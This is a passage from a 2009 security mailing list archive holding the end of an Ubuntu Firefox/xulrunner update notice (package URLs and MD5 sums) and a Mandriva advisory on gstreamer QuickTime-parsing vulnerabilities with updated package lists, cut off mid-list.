http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-granparadiso_3.0.6+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 65828 a62f716f84713ecfa1a33408e3872bd2 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-libthai_3.0.6+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 65818 10dc6e5214d80b1624114c37bb86f738 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk-dom-inspector_3.0.6+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 8946 c8fb67a942b0d7d77aae0222f5e29887 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk-gnome-support_3.0.6+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 65844 5b4ed7aa2e26b77b6c95bb44d3869750 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk-venkman_3.0.6+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 8934 ec245ae15b0ba68b501af7a188e20c78 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk_3.0.6+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 65806 726700c8e49d8e2ece5c84262ab82849 http://security.ubuntu.com/ubuntu/pool/universe/x/xulrunner-1.9/xulrunner-1.9-dom-inspector_1.9.0.6+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 125468 591ac192642c55dd439ee6dd1d4a1a62 http://security.ubuntu.com/ubuntu/pool/universe/x/xulrunner-1.9/xulrunner-1.9-venkman_1.9.0.6+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 235298 194d01564975da1065f994fda7ec9c3a amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.6+nobinonly-0ubuntu0.8.04.1_amd64.deb Size/MD5: 9028 a575ef97892b265117c921490478c749 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.6+nobinonly-0ubuntu0.8.04.1_amd64.deb Size/MD5: 29740 49d84b67f840254959132b1568ae46be http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.6+nobinonly-0ubuntu0.8.04.1_amd64.deb Size/MD5: 1091924 5eb7c34ffbc5cac1ec3428fb6ff81daa http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9-dev_1.9.0.6+nobinonly-0ubuntu0.8.04.1_amd64.deb Size/MD5: 4450518 8268133a51caf767e6bd3b7974e9c6f2 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9-gnome-support_1.9.0.6+nobinonly-0ubuntu0.8.04.1_amd64.deb Size/MD5: 48682 da2d1192a88c460a80fee528be093d73 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.6+nobinonly-0ubuntu0.8.04.1_amd64.deb Size/MD5: 9062436 75bb3c5a7a40c2c09832a5db61c5f320 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.6+nobinonly-0ubuntu0.8.04.1_i386.deb Size/MD5: 9026 dcb3ffe9961637a24f4a92900bf506cb http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.6+nobinonly-0ubuntu0.8.04.1_i386.deb Size/MD5: 25686 5c83329675e0bec00f0e1f6fa263be35 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.6+nobinonly-0ubuntu0.8.04.1_i386.deb Size/MD5: 1071068 4d6756aa7b216b50e8357dd6469147f5 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9-dev_1.9.0.6+nobinonly-0ubuntu0.8.04.1_i386.deb Size/MD5: 4437824 3285afec7e972337675f9771f64ed668 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9-gnome-support_1.9.0.6+nobinonly-0ubuntu0.8.04.1_i386.deb Size/MD5: 38588 44673073b942d11924cdf56ba3df690b http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.6+nobinonly-0ubuntu0.8.04.1_i386.deb Size/MD5: 7813284 273b331b31de831a4a39d25a49d999a4 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.6+nobinonly-0ubuntu0.8.04.1_lpia.deb Size/MD5: 9024 795d386d153f97be00bb1a426fc15330 http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.6+nobinonly-0ubuntu0.8.04.1_lpia.deb Size/MD5: 25304 de597f7551e871e1f57fe7e1a31774a3 http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0_3.0.6+nobinonly-0ubuntu0.8.04.1_lpia.deb Size/MD5: 1069414 9851027bd003573746541269877bb84d http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-dev_1.9.0.6+nobinonly-0ubuntu0.8.04.1_lpia.deb Size/MD5: 4428972 a940da665b7b409066cf234921180a97 http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-gnome-support_1.9.0.6+nobinonly-0ubuntu0.8.04.1_lpia.deb Size/MD5: 37546 16eb7adda58ba8ac943b7815ef7a3871 http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.6+nobinonly-0ubuntu0.8.04.1_lpia.deb Size/MD5: 7696132 9283cdb44b3215147e0abdc0620ec4d3 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.6+nobinonly-0ubuntu0.8.04.1_powerpc.deb Size/MD5: 9030 891e46ef9a1aef332d3df52dcfb8d19c http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.6+nobinonly-0ubuntu0.8.04.1_powerpc.deb Size/MD5: 27506 72d42ec8e4060dc2d642810b84be4077 http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0_3.0.6+nobinonly-0ubuntu0.8.04.1_powerpc.deb Size/MD5: 1084224 96e261886e771af178fb932dc7f269b8 http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-dev_1.9.0.6+nobinonly-0ubuntu0.8.04.1_powerpc.deb Size/MD5: 4028840 ff6de6d173949cc34bafcd2fa4b64b84 http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-gnome-support_1.9.0.6+nobinonly-0ubuntu0.8.04.1_powerpc.deb Size/MD5: 43668 ce09a7ed59b34d9ac1a227dc1f7cff8a http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.6+nobinonly-0ubuntu0.8.04.1_powerpc.deb Size/MD5: 8616998 a18d048f4b68e41a60044f3804044ab9 Updated packages for Ubuntu 8.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.6+nobinonly-0ubuntu0.8.10.1.diff.gz Size/MD5: 123854 5eb9af8cc607c980d141364a77065c17 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.6+nobinonly-0ubuntu0.8.10.1.dsc Size/MD5: 2766 99c48d12708f9cf8ca1255ab0d2a39ef http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.6+nobinonly.orig.tar.gz Size/MD5: 11180629 f7306d068c261f95c284fba5a75a6c71 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.6+nobinonly-0ubuntu0.8.10.1.diff.gz Size/MD5: 251224 fa9a4f293ca4d0d5045f9680d53d5c96 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.6+nobinonly-0ubuntu0.8.10.1.dsc Size/MD5: 2794 c42552247a5657a41d07d7ce5203ecc1 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.6+nobinonly.orig.tar.gz Size/MD5: 41504221 c3b32d6f68af24a75e4c902cb2ddbc09 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/abrowser_3.0.6+nobinonly-0ubuntu0.8.10.1_all.deb Size/MD5: 68878 ed90d727a49bbadd3503458c4d1bd922 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-dev_3.0.6+nobinonly-0ubuntu0.8.10.1_all.deb Size/MD5: 68782 87ffabc6b89b467f305649830ffa9c82 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-gnome-support_3.0.6+nobinonly-0ubuntu0.8.10.1_all.deb Size/MD5: 68792 78dd805c6027aeac6d99d87487e67d08 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-granparadiso-dev_3.0.6+nobinonly-0ubuntu0.8.10.1_all.deb Size/MD5: 68756 8394edd832cb58014187941a43999ef5 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-trunk-dev_3.0.6+nobinonly-0ubuntu0.8.10.1_all.deb Size/MD5: 68742 9537b48d032b9cd82856940efc0964a4 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox_3.0.6+nobinonly-0ubuntu0.8.10.1_all.deb Size/MD5: 68872 2b3bc01c0502214b21069538107d727b http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-3.0-dom-inspector_3.0.6+nobinonly-0ubuntu0.8.10.1_all.deb Size/MD5: 68800 ea0d87d1e8f07f08ba34d3562a31c4c6 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-3.0-venkman_3.0.6+nobinonly-0ubuntu0.8.10.1_all.deb Size/MD5: 68752 27d56b3630cbd6b3fa79e9da1cce611a http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-dom-inspector_3.0.6+nobinonly-0ubuntu0.8.10.1_all.deb Size/MD5: 8968 67da562edf4df7832aeb222a56a2c0d9 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-granparadiso-dom-inspector_3.0.6+nobinonly-0ubuntu0.8.10.1_all.deb Size/MD5: 8958 2644e20ea755ee36e04e271c9d1ba1bc http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-granparadiso-gnome-support_3.0.6+nobinonly-0ubuntu0.8.10.1_all.deb Size/MD5: 68772 ceceabc7ab558738da2323a66f8897e8 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-granparadiso_3.0.6+nobinonly-0ubuntu0.8.10.1_all.deb Size/MD5: 68744 dc3fee0726ee341fbb6ddfcd9ec1f1cf http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-libthai_3.0.6+nobinonly-0ubuntu0.8.10.1_all.deb Size/MD5: 68732 b00be3635032695f79604b02c57c8faa http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk-dom-inspector_3.0.6+nobinonly-0ubuntu0.8.10.1_all.deb Size/MD5: 8944 6db5ec69884f667e8369fbcc49cc8304 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk-gnome-support_3.0.6+nobinonly-0ubuntu0.8.10.1_all.deb Size/MD5: 68760 454aca37921589c3b74a2448a4073ff7 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk-venkman_3.0.6+nobinonly-0ubuntu0.8.10.1_all.deb Size/MD5: 8934 f1bcff624ea0c0386c55062bff9c9e68 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk_3.0.6+nobinonly-0ubuntu0.8.10.1_all.deb Size/MD5: 68726 9436faf6054364b44eebf32c559f950a http://security.ubuntu.com/ubuntu/pool/universe/x/xulrunner-1.9/xulrunner-1.9-dom-inspector_1.9.0.6+nobinonly-0ubuntu0.8.10.1_all.deb Size/MD5: 127760 c8126a5db486c695e71b428b9c571ad1 http://security.ubuntu.com/ubuntu/pool/universe/x/xulrunner-1.9/xulrunner-1.9-venkman_1.9.0.6+nobinonly-0ubuntu0.8.10.1_all.deb Size/MD5: 237822 b440b3b72dc00feb81657173c73984ca amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/abrowser-3.0-branding_3.0.6+nobinonly-0ubuntu0.8.10.1_amd64.deb Size/MD5: 198336 6361e539637def42f67396cd216c49c3 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-branding_3.0.6+nobinonly-0ubuntu0.8.10.1_amd64.deb Size/MD5: 201764 8536462b9963d3f0cb07c31e3894adc6 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.6+nobinonly-0ubuntu0.8.10.1_amd64.deb Size/MD5: 68838 e1e9d7e140bb2c79997cbf2f1fa30bbd http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.6+nobinonly-0ubuntu0.8.10.1_amd64.deb Size/MD5: 88232 fa2bdb12ff9a8d7e8c754888e4bb8f3b http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.6+nobinonly-0ubuntu0.8.10.1_amd64.deb Size/MD5: 906364 da574c215590f93a8bd1b9e455ec9e2f http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9-dev_1.9.0.6+nobinonly-0ubuntu0.8.10.1_amd64.deb Size/MD5: 4984526 634e691770102d04f85a6cf6db487304 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9-gnome-support_1.9.0.6+nobinonly-0ubuntu0.8.10.1_amd64.deb Size/MD5: 47064 c8af5dafb7823bae2fee3fa801dd3105 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.6+nobinonly-0ubuntu0.8.10.1_amd64.deb Size/MD5: 8733332 1c85a4e3e06ac189438341268439bf61 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-dev_1.9.0.6+nobinonly-0ubuntu0.8.10.1_amd64.deb Size/MD5: 22494 735532b1360ede105f56598f41cb8a70 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/abrowser-3.0-branding_3.0.6+nobinonly-0ubuntu0.8.10.1_i386.deb Size/MD5: 203608 ea24117110d1cfff534ab76f3ca862b5 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-branding_3.0.6+nobinonly-0ubuntu0.8.10.1_i386.deb Size/MD5: 202138 076232931f266edb189416e974266a98 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.6+nobinonly-0ubuntu0.8.10.1_i386.deb Size/MD5: 68840 ef9f3612a61220022a280e370f527b16 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.6+nobinonly-0ubuntu0.8.10.1_i386.deb Size/MD5: 84282 acc9e8b502808b65d5a30be04be42302 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.6+nobinonly-0ubuntu0.8.10.1_i386.deb Size/MD5: 885350 6665202fe8c152f48cbf1591ebed93f3 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9-dev_1.9.0.6+nobinonly-0ubuntu0.8.10.1_i386.deb Size/MD5: 4954618 d73cb09470917f27e4d1e8b8eacb79ce http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9-gnome-support_1.9.0.6+nobinonly-0ubuntu0.8.10.1_i386.deb Size/MD5: 39454 0f044675aab70caa5e0f610c829f687d http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.6+nobinonly-0ubuntu0.8.10.1_i386.deb Size/MD5: 7563740 61a5e2807bbe5caba44968ac181ef140 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-dev_1.9.0.6+nobinonly-0ubuntu0.8.10.1_i386.deb Size/MD5: 22498 42b3898fefda9a5c6098b2a22d859f4f lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/f/firefox-3.0/abrowser-3.0-branding_3.0.6+nobinonly-0ubuntu0.8.10.1_lpia.deb Size/MD5: 198084 7ff37decf8a4a57940785671c7c4707c http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-branding_3.0.6+nobinonly-0ubuntu0.8.10.1_lpia.deb Size/MD5: 201306 32cc39b567f1d22cd023481779c246cd http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.6+nobinonly-0ubuntu0.8.10.1_lpia.deb Size/MD5: 68778 4c271575af18ed49ca16bd7999eca2ad http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.6+nobinonly-0ubuntu0.8.10.1_lpia.deb Size/MD5: 84300 056ad9092a7f0a270edcad48141af0d8 http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0_3.0.6+nobinonly-0ubuntu0.8.10.1_lpia.deb Size/MD5: 884652 56d9c0316fa92c8ccf74fea4250c41b0 http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-dev_1.9.0.6+nobinonly-0ubuntu0.8.10.1_lpia.deb Size/MD5: 4955706 560a919e63e36fc4b3fb52208e291d93 http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-gnome-support_1.9.0.6+nobinonly-0ubuntu0.8.10.1_lpia.deb Size/MD5: 38452 6da3195179b5a5379e2fb7c4fa74eee1 http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.6+nobinonly-0ubuntu0.8.10.1_lpia.deb Size/MD5: 7464230 f81a06670d47cde0eaa511cfb47cac06 http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-dev_1.9.0.6+nobinonly-0ubuntu0.8.10.1_lpia.deb Size/MD5: 22312 d4aba0c381a3fb4fecfbc0d71aa01b95 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/f/firefox-3.0/abrowser-3.0-branding_3.0.6+nobinonly-0ubuntu0.8.10.1_powerpc.deb Size/MD5: 203610 25bc60c85ae5e082a0c4f3b2f37f4255 http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-branding_3.0.6+nobinonly-0ubuntu0.8.10.1_powerpc.deb Size/MD5: 201974 df219ab232cc417f097bb845a73f6a62 http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.6+nobinonly-0ubuntu0.8.10.1_powerpc.deb Size/MD5: 68844 72965f097fd6d0f6fd6b3d8b5c8b9aec http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.6+nobinonly-0ubuntu0.8.10.1_powerpc.deb Size/MD5: 85698 a5f825d00ec30299aa30d042ae4932a6 http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0_3.0.6+nobinonly-0ubuntu0.8.10.1_powerpc.deb Size/MD5: 898222 add6ae49c0b4118adaf6b21ba632c66d http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-dev_1.9.0.6+nobinonly-0ubuntu0.8.10.1_powerpc.deb Size/MD5: 4533050 47146ffecd0b0db849497637b0a0bb6b http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-gnome-support_1.9.0.6+nobinonly-0ubuntu0.8.10.1_powerpc.deb Size/MD5: 42408 0b6c4c6e1591a7e45d40760947fe64b6 http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.6+nobinonly-0ubuntu0.8.10.1_powerpc.deb Size/MD5: 8273998 5c8b6e55a9a4cf2af73299279619fd5e http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-dev_1.9.0.6+nobinonly-0ubuntu0.8.10.1_powerpc.deb Size/MD5: 22500 3823abc3a2f63be4d1ba8c0deb264836 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/f/firefox-3.0/abrowser-3.0-branding_3.0.6+nobinonly-0ubuntu0.8.10.1_sparc.deb Size/MD5: 203600 21e5f298ce9eebf6961ed5df9c492d4c http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-branding_3.0.6+nobinonly-0ubuntu0.8.10.1_sparc.deb Size/MD5: 201972 fb3fcbf79a27708ab8e0a76140f07c79 http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.6+nobinonly-0ubuntu0.8.10.1_sparc.deb Size/MD5: 68842 94c43c32c310476e8c0168c694b783ce http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.6+nobinonly-0ubuntu0.8.10.1_sparc.deb Size/MD5: 83394 531ccc5cf4f71116ab32b6baca072e72 http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0_3.0.6+nobinonly-0ubuntu0.8.10.1_sparc.deb Size/MD5: 886646 481460e1a6a961fe08b7144845ae86bc http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-dev_1.9.0.6+nobinonly-0ubuntu0.8.10.1_sparc.deb Size/MD5: 4519408 a545337a375ebc4d9eb4ec1115a7b8b1 http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-gnome-support_1.9.0.6+nobinonly-0ubuntu0.8.10.1_sparc.deb Size/MD5: 37870 ce67b9084164ebfdb2fea7f76b19af79 http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.6+nobinonly-0ubuntu0.8.10.1_sparc.deb Size/MD5: 8092686 5cdd2e017bb05cb2d2ec424752a770d0 http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-dev_1.9.0.6+nobinonly-0ubuntu0.8.10.1_sparc.deb Size/MD5: 22504 d7d84e7d9443d8fc01822bdfd3035872 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090210/d8cb96df/attachment.bin From security at mandriva.com Wed Feb 11 04:17:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Wed, 11 Feb 2009 05:17:00 +0100 Subject: [Full-disclosure] [ MDVSA-2009:035 ] gstreamer0.10-plugins-good Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:035 http://www.mandriva.com/security/ _______________________________________________________________________ Package : gstreamer0.10-plugins-good Date : February 10, 2009 Affected: 2008.0, 2008.1, 2009.0 _______________________________________________________________________ Problem Description: Security vulnerabilities have been discovered and corrected in gstreamer0.10-plugins-good, might allow remote attackers to execute arbitrary code via a malformed QuickTime media file (CVE-2009-0386, CVE-2009-0387, CVE-2009-0397). The updated packages have been patched to prevent this. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0386 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0387 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0397 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: 72a2a267f064b3557c0e7da869187920 2008.0/i586/gstreamer0.10-aalib-0.10.6-3.2mdv2008.0.i586.rpm fe8a04fcd9240eaa887fa5d1147c86e9 2008.0/i586/gstreamer0.10-caca-0.10.6-3.2mdv2008.0.i586.rpm 639e4701b8431b8fff2df2d196ce3b6c 2008.0/i586/gstreamer0.10-dv-0.10.6-3.2mdv2008.0.i586.rpm c2a123762a863578a24d7ea82ab693cd 2008.0/i586/gstreamer0.10-esound-0.10.6-3.2mdv2008.0.i586.rpm 8fe61dd52cd465ae43beb7e1ba311ce4 2008.0/i586/gstreamer0.10-flac-0.10.6-3.2mdv2008.0.i586.rpm a80a7ef4f5ac1d7280f4290d2c770485 2008.0/i586/gstreamer0.10-plugins-good-0.10.6-3.2mdv2008.0.i586.rpm 97152f5ecea0a2c23b349191794f2700 2008.0/i586/gstreamer0.10-raw1394-0.10.6-3.2mdv2008.0.i586.rpm 18ad6400d673b07d8f8037177873e144 2008.0/i586/gstreamer0.10-speex-0.10.6-3.2mdv2008.0.i586.rpm 935441a9449d351bf3e0a6bfee3ac64a 2008.0/i586/gstreamer0.10-wavpack-0.10.6-3.2mdv2008.0.i586.rpm f8e312ce8de8ac8d6d6e2bbfcdaf93aa 2008.0/SRPMS/gstreamer0.10-plugins-good-0.10.6-3.2mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: a140386b0f5b582d8e64cc5584f86fde 2008.0/x86_64/gstreamer0.10-aalib-0.10.6-3.2mdv2008.0.x86_64.rpm 5eb03a60b115cec41d78478b92586537 2008.0/x86_64/gstreamer0.10-caca-0.10.6-3.2mdv2008.0.x86_64.rpm 564d6a79a523ad54d7f70c02a298bba1 2008.0/x86_64/gstreamer0.10-dv-0.10.6-3.2mdv2008.0.x86_64.rpm 9cfbae1621e6e002f764e780194d0376 2008.0/x86_64/gstreamer0.10-esound-0.10.6-3.2mdv2008.0.x86_64.rpm a8e034c1ec0bcfb2c3048269940340ed 2008.0/x86_64/gstreamer0.10-flac-0.10.6-3.2mdv2008.0.x86_64.rpm d14231b2f55e4c9959b765d091e7bafd 2008.0/x86_64/gstreamer0.10-plugins-good-0.10.6-3.2mdv2008.0.x86_64.rpm 312e887d320ae3c36597f3a2085f64e5 2008.0/x86_64/gstreamer0.10-raw1394-0.10.6-3.2mdv2008.0.x86_64.rpm f4ab3bc506034b9d2e4e64fded34b026 2008.0/x86_64/gstreamer0.10-speex-0.10.6-3.2mdv2008.0.x86_64.rpm 4f9fc5a9aadc3350c32fe95bb4824c82 2008.0/x86_64/gstreamer0.10-wavpack-0.10.6-3.2mdv2008.0.x86_64.rpm f8e312ce8de8ac8d6d6e2bbfcdaf93aa 2008.0/SRPMS/gstreamer0.10-plugins-good-0.10.6-3.2mdv2008.0.src.rpm Mandriva Linux 2008.1: 37ee72c4dd8c4d1d65b21d5f7c4174cf 2008.1/i586/gstreamer0.10-aalib-0.10.7-3.2mdv2008.1.i586.rpm 94bc8fbbd6b27f76172be895762a7d22 2008.1/i586/gstreamer0.10-caca-0.10.7-3.2mdv2008.1.i586.rpm 4822f9a52e11966aa1a3b82e8636eafb 2008.1/i586/gstreamer0.10-dv-0.10.7-3.2mdv2008.1.i586.rpm ed36bf5b66d719c449de031c3973fbf5 2008.1/i586/gstreamer0.10-esound-0.10.7-3.2mdv2008.1.i586.rpm 81bd4565763e2d857d05875fdc299d99 2008.1/i586/gstreamer0.10-flac-0.10.7-3.2mdv2008.1.i586.rpm fe7dd742de6d0510c337c743fe6da912 2008.1/i586/gstreamer0.10-plugins-good-0.10.7-3.2mdv2008.1.i586.rpm 86f44f42f73a2eb0dea5dc83b11fa4cf 2008.1/i586/gstreamer0.10-raw1394-0.10.7-3.2mdv2008.1.i586.rpm 831da1ff4308a0328280992f62137932 2008.1/i586/gstreamer0.10-speex-0.10.7-3.2mdv2008.1.i586.rpm 6e7590f10fcc99ae46a7e4970df836de 2008.1/i586/gstreamer0.10-wavpack-0.10.7-3.2mdv2008.1.i586.rpm f18f7ec53b3b8653e449c1aeecb31138 2008.1/SRPMS/gstreamer0.10-plugins-good-0.10.7-3.2mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: e25059da03c9110f482e2fbf93fd8933 2008.1/x86_64/gstreamer0.10-aalib-0.10.7-3.2mdv2008.1.x86_64.rpm 0dcb67eb17fa5b2268b7dd37233fb261 2008.1/x86_64/gstreamer0.10-caca-0.10.7-3.2mdv2008.1.x86_64.rpm 2efe3887ed7e82ebe16843b083295db6 2008.1/x86_64/gstreamer0.10-dv-0.10.7-3.2mdv2008.1.x86_64.rpm 1f59d9b91fb95b8b88671fd971ef3be2 2008.1/x86_64/gstreamer0.10-esound-0.10.7-3.2mdv2008.1.x86_64.rpm 192b9d4522516d89ebe0b29dfe80107b 2008.1/x86_64/gstreamer0.10-flac-0.10.7-3.2mdv2008.1.x86_64.rpm 0c7510e8bbaf11a984b5d43993fd6606 2008.1/x86_64/gstreamer0.10-plugins-good-0.10.7-3.2mdv2008.1.x86_64.rpm e78b8da20599d9b3557f3c2d7b3d64a0 2008.1/x86_64/gstreamer0.10-raw1394-0.10.7-3.2mdv2008.1.x86_64.rpm b2cadc38e7054fa29b2c39341b14c8f8 2008.1/x86_64/gstreamer0.10-speex-0.10.7-3.2mdv2008.1.x86_64.rpm 6f70bd674d5c66af13910a768618dd2b 2008.1/x86_64/gstreamer0.10-wavpack-0.10.7-3.2mdv2008.1.x86_64.rpm f18f7ec53b3b8653e449c1aeecb31138 2008.1/SRPMS/gstreamer0.10-plugins-good-0.10.7-3.2mdv2008.1.src.rpm Mandriva Linux 2009.0: fd0c54e1c7e9e89fee53b87afc6218e8 2009.0/i586/gstreamer0.10-aalib-0.10.10-2.1mdv2009.0.i586.rpm 1e22dfe9f0a620be5d1842ce6651c416 2009.0/i586/gstreamer0.10-caca-0.10.10-2.1mdv2009.0.i586.rpm 065cc2305d32afec3475f3f0e687a81b 2009.0/i586/gstreamer0.10-dv-0.10.10-2.1mdv2009.0.i586.rpm 